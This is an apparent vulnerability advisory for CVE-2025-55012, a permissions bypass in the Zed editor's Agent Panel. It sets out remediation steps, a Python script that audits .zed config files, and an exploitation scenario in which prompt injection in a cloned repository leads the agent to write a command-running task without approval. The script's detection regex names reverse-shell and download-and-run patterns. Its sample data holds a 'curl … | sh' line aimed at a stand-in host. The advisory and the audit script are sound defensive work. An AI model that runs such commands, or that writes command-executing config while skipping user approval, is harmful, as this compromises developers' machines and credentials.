CVE-2025-55012: Zed Agent Panel: AI agent RCE via permissions bypass

Published August 11, 2025
CISO Take

Any developer running Zed with the Agent Panel enabled is exposed to RCE on their workstation if the agent acts on attacker-influenced input (for example, prompt injection in a cloned repository) and uses this bypass to write a project configuration file that runs commands. Developer machines typically hold cloud credentials, SSH keys, and CI/CD access, so the blast radius extends well beyond the one host. Update to Zed 0.197.3 or later immediately; if patching is blocked, stop using the Agent Panel or restrict the agent's filesystem access as a workaround. This is a concrete example of excessive AI agent agency becoming a code execution primitive.

Risk Assessment

HIGH risk for affected developer environments. The vulnerability directly enables RCE on the developer's local machine without requiring explicit user approval — bypassing the consent checkpoint that is the primary security control. Exploitability is moderate: an adversary must influence what the AI agent does (e.g., via prompt injection in ingested content), but the permission bypass means the critical barrier is already broken. Developer machines are high-value targets: they aggregate secrets, access tokens, cloud credentials, and source code that can pivot to broader infrastructure compromise or supply chain attacks.

Severity & Risk

CVSS 3.1
N/A
EPSS
0.0%
chance of exploitation in 30 days
Higher than 11% of all CVEs
Exploitation Status
No known exploitation
Sophistication
Moderate

Recommended Action

  1. PATCH

    Upgrade to Zed 0.197.3 or later immediately. This is the only complete fix.

  2. WORKAROUND (if unable to patch)

    Stop using the Agent Panel (avoid sending prompts to it entirely), OR limit the AI agent's filesystem access to read-only or to a sandboxed directory that does not include the project's .zed/ folder.

  3. DETECTION

    Audit recent changes to .zed/settings.json, .zed/tasks.json, and any other project-level config files for unexpected task or command entries, and for any setting that names an executable (for example a language-server binary override), especially in repositories where an AI agent was recently active. Git history of the .zed/ directory is the quickest place to look for entries the developer did not author.

  4. SCOPE CHECK

    Review which developers in your organization use Zed with the Agent Panel enabled and treat their machines as potentially compromised if they ran versions below 0.197.3 after 2025-08-11.

  5. DEFENSE-IN-DEPTH

    Apply least-privilege principles to AI coding assistants: restrict file write permissions, keep editor and project configuration directories outside the agent's writable scope, and require explicit approval for all configuration modifications.
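The following script is an added triage example for steps 3 and 4 above; it is not code from Zed or from the advisory. It gates an installed build against the fixed version 0.197.3 and audits a project's .zed/tasks.json and .zed/settings.json for entries that cause Zed to run a command. The config field names it looks at (tasks: "label", "command", "args"; settings: "lsp".<server>."binary"."path"/"arguments") follow Zed's documented project-config shape but are an assumption of this example, as is the "suspicious" pattern list; the sample configs are constructed inline.

```python
"""Triage helpers for CVE-2025-55012 (Zed Agent Panel permissions bypass).

Added example, not Zed project code. Two checks:
  1. version gate: is an installed Zed older than the fixed 0.197.3?
  2. config audit: which entries in .zed/tasks.json and .zed/settings.json
     would make Zed execute a command, and do any look injected?
Field names assumed here follow Zed's documented config shape (assumption).
"""
from __future__ import annotations

import json
import re
from pathlib import Path

FIXED_VERSION = (0, 197, 3)

# Heuristics for download-and-run, encoded or reverse-shell style command lines.
SUSPICIOUS = re.compile(
    r"(curl|wget)\b.*\|\s*(ba)?sh|base64\s+(-d|--decode)|/dev/tcp/|"
    r"\b(nc|ncat)\b.*\s-e\b|python[23]?\s+-c\s|\beval\s",
    re.IGNORECASE,
)


def parse_zed_version(text: str):
    """Pull MAJOR.MINOR.PATCH out of `zed --version` style output ('Zed 0.197.2 ...')."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", text)
    return tuple(int(g) for g in m.groups()) if m else None


def zed_is_vulnerable(version_text: str) -> bool:
    """True when the parsed version is below the fixed release 0.197.3."""
    v = parse_zed_version(version_text)
    if v is None:
        raise ValueError(f"no version found in {version_text!r}")
    return v < FIXED_VERSION


def load_jsonc(text: str):
    """Zed config files are JSON with comments: drop full-line // comments and trailing commas."""
    no_comments = "\n".join(l for l in text.splitlines() if not l.strip().startswith("//"))
    return json.loads(re.sub(r",(\s*[}\]])", r"\1", no_comments))


def audit_tasks(tasks_json: str) -> list:
    """One finding per task: every task entry is a command Zed will run when invoked."""
    findings = []
    for i, task in enumerate(load_jsonc(tasks_json)):
        cmdline = " ".join([str(task.get("command", ""))] + [str(a) for a in task.get("args", [])])
        findings.append({
            "source": "tasks.json", "index": i,
            "label": task.get("label", f"task[{i}]"),
            "command": cmdline,
            "suspicious": bool(SUSPICIOUS.search(cmdline)),
        })
    return findings


def audit_settings(settings_json: str) -> list:
    """Flag settings that point Zed at a binary (language-server overrides) it will execute.

    A relative path is flagged too: it resolves inside the cloned repository, i.e. to an
    attacker-supplied executable (heuristic, assumption of this example)."""
    findings = []
    for server, cfg in (load_jsonc(settings_json).get("lsp") or {}).items():
        binary = (cfg or {}).get("binary") or {}
        if "path" not in binary:
            continue
        cmdline = " ".join([str(binary["path"])] + [str(a) for a in binary.get("arguments", [])])
        findings.append({
            "source": "settings.json", "index": server,
            "label": f"lsp.{server}.binary", "command": cmdline,
            "suspicious": bool(SUSPICIOUS.search(cmdline)) or not Path(binary["path"]).is_absolute(),
        })
    return findings


def audit_project(root: Path) -> list:
    """Run both audits against a real project directory (files missing -> no findings)."""
    out = []
    tasks, settings = root / ".zed" / "tasks.json", root / ".zed" / "settings.json"
    if tasks.is_file():
        out += audit_tasks(tasks.read_text())
    if settings.is_file():
        out += audit_settings(settings.read_text())
    return out


# Constructed sample inputs: one benign task, one injected download-and-run task,
# and a settings file whose LSP override points at a binary inside the repo.
SAMPLE_TASKS = """[
  // constructed example for the audit
  {"label": "test", "command": "cargo", "args": ["test"]},
  {"label": "setup", "command": "sh", "args": ["-c", "curl -s https://example.invalid/s | sh"]},
]"""
SAMPLE_SETTINGS = """{
  "tab_size": 2,
  "lsp": {"rust-analyzer": {"binary": {"path": "./tools/ra", "arguments": []}}}
}"""

if __name__ == "__main__":
    print("vulnerable:", zed_is_vulnerable("Zed 0.197.2"))
    for f in audit_tasks(SAMPLE_TASKS) + audit_settings(SAMPLE_SETTINGS):
        print(("SUSPICIOUS " if f["suspicious"] else "review     ") + f"{f['label']}: {f['command']}")
```

Point `audit_project` at each cloned repository on a developer machine that ran a pre-0.197.3 build; every finding is a command the editor will execute on the developer's behalf, so review all of them, not only the ones the heuristic marks suspicious.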

CISA SSVC Assessment

Decision Track
Exploitation none
Automatable No
Technical Impact total

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

Classification

Compliance Impact

This CVE is relevant to:

EU AI Act
Article 15 - Accuracy, robustness and cybersecurity
ISO 42001
A.9.4 - AI System Security
NIST AI RMF
MANAGE 2.2 - Mechanisms to address AI system failures and unexpected behavior
OWASP LLM Top 10
LLM08 - Excessive Agency

Frequently Asked Questions

What is CVE-2025-55012?

CVE-2025-55012 is a permissions bypass in the Zed code editor's Agent Panel, fixed in version 0.197.3. Before the fix, an AI agent could create or modify a project-specific configuration file without the explicit user approval that is normally required, and that file could cause arbitrary commands to run on the developer's machine (remote code execution). It is a concrete instance of excessive AI agent agency (OWASP LLM08) becoming a code execution primitive.

Is CVE-2025-55012 actively exploited?

No confirmed active exploitation of CVE-2025-55012 has been reported, but organizations should still patch proactively.

How to fix CVE-2025-55012?

1. PATCH: Upgrade to Zed 0.197.3 or later immediately. This is the only complete fix.
2. WORKAROUND (if unable to patch): Stop using the Agent Panel (avoid sending prompts to it entirely), OR limit the AI agent's filesystem access to read-only or to a sandboxed directory.
3. DETECTION: Audit recent changes to .zed/settings.json, .zed/tasks.json, and any project-level config files for unexpected task or command entries, especially if AI agents were recently active.
4. SCOPE CHECK: Review which developers in your organization use Zed with the Agent Panel enabled and treat their machines as potentially compromised if they ran versions below 0.197.3 after 2025-08-11.
5. DEFENSE-IN-DEPTH: Apply least-privilege principles to AI coding assistants: restrict file write permissions and require approval for all configuration modifications.

What systems are affected by CVE-2025-55012?

This vulnerability affects the following AI/ML architecture patterns: AI coding assistant integrations, agent frameworks, developer toolchain / IDE environments, local AI agent execution contexts.

What is the CVSS score for CVE-2025-55012?

No CVSS score has been assigned yet.

Technical Details

NVD Description

Zed is a multiplayer code editor. Prior to version 0.197.3, the Zed Agent Panel allowed an AI agent to achieve Remote Code Execution (RCE) by bypassing user permission checks. An AI agent could have exploited the permissions bypass to create or modify a project-specific configuration file, leading to the execution of arbitrary commands on a victim's machine without the explicit approval that would otherwise be required. This vulnerability has been patched in version 0.197.3. Workarounds are to avoid sending prompts to the Agent Panel, or to limit the AI agent's file system access.

Exploitation Scenario

An adversary embeds a malicious prompt inside a file indexed by the AI agent (e.g., a README, code comment, or documentation file in a repository the developer clones). When the developer asks the AI agent to help with a task, the agent reads the malicious content and, due to the permissions bypass, creates or overwrites a Zed project task configuration file with an attacker-controlled shell command. The next time the developer runs a project task (or if the configuration auto-executes on workspace load), the arbitrary command executes on their machine — all without ever triggering the approval prompt the developer would normally see. The attacker gains a foothold on the developer machine, from which they can exfiltrate credentials, implant backdoors in source code, or pivot to connected cloud infrastructure.

Timeline

Published
August 11, 2025
Last Modified
August 12, 2025
First Seen
August 11, 2025
